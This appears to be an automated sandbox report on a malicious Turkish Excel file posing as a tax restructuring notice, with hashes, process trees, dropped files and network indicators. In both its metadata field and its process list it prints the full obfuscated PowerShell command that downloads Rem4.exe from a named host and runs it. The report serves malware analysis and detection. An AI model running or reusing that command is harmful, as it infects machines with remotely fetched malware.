File name: | GIB 12. YENI VERGI YAPILANDIRMA.xls |
Full analysis: | https://app.any.run/tasks/a55d858d-b9e4-46f3-a6e5-1635575d2bf6 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 15:06:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: USER, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Dec 17 07:11:47 2018, Last Saved Time/Date: Wed Dec 19 20:47:31 2018, Security: 0 |
MD5: | 8200197AB2227C7A0F2D825BABB697EB |
SHA1: | EAC226F6673C083F5BC62D39B1C99EC011262FD5 |
SHA256: | 7EC4DA947D57EBD3ADABBB7B2FE94DF5EA8448410081E0262A9253287F189A44 |
SSDEEP: | 768:S69lYLFSYiRUBxm2UDvZSvfjCwA3Mem1L4VXlPNG9MRy/3atNfNfhSigTf236xyv:r3YLAYiRUBxm2UDvZSvfjCwA8em1L4VX |
.xls | Microsoft Excel sheet (78.9) |
Author: | USER |
LastModifiedBy: | USER |
Software: | Microsoft Excel |
CreateDate: | 2018:12:17 07:11:47 |
ModifyDate: | 2018:12:19 20:47:31 |
Security: | None |
CodePage: | Unicode (UTF-8) |
Company: | poWERSHELl.EXe -EX BYpASs -nOp -w HIDden -ec CQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA= |
AppVersion: | 14 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | Sayfa1 |
HeadingPairs: | |
CompObjUserTypeLen: | 37 |
CompObjUserType: | Microsoft Excel 2003 Çalışma Sayfası |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2384 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 | | | |
1156 | poWERSHELl.EXe -EX BYpASs -nOp -w HIDden -ec CQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA= | C:\Windows\System32\WindowsPowerShell\v1.0\poWERSHELl.EXe | | EXCEL.EXE |
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8851.tmp.cvr | — | — | — |
1156 | poWERSHELl.EXe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\76Q4ZAHRNLOW5U5YLPZG.temp | — | — | — |
2384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\VBE\RefEdit.exd | tlb | 36DA875E8FEB6EF58668B4C33A1703BD | 3F35267980DDC72329423FB2BF8E7227EA733F8A773C52507A6470344972B28D |
1156 | poWERSHELl.EXe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
1156 | poWERSHELl.EXe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf92b1.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
2384 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\GIB 12. YENI VERGI YAPILANDIRMA.xls.LNK | lnk | D234DD9CBA40C215283B5C97C2D52420 | D2597629D88050E16507AFA7E4BABA653984E69A903E0014FFA50B37836C8789 |
2384 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | BAC63DCBFC64AF81BA051F4F2C2F8E09 | 815420AE88FEDEA409DB13E1E7A79A26970BF0D68BA257F331EBA0B97D7F0A83 |
2384 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | BB53F60AE247473CCC5395DD757F5B6D | A5204EDF54B58057CCDA2E17A229366383B5BC04CA40200566A8B8692D1348C8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1156 | poWERSHELl.EXe | GET | 301 | 37.61.239.108:80 | http://www.timucinmuratalan.com/Rem4.exe | GB | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1156 | poWERSHELl.EXe | 37.61.239.108:80 | www.timucinmuratalan.com | Namecheap, Inc. | GB | suspicious |
Domain | IP | Reputation |
---|---|---|
www.timucinmuratalan.com | | suspicious |
timucinmuratalan.com | | suspicious |
PID | Process | Class | Message |
---|---|---|---|
1156 | poWERSHELl.EXe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |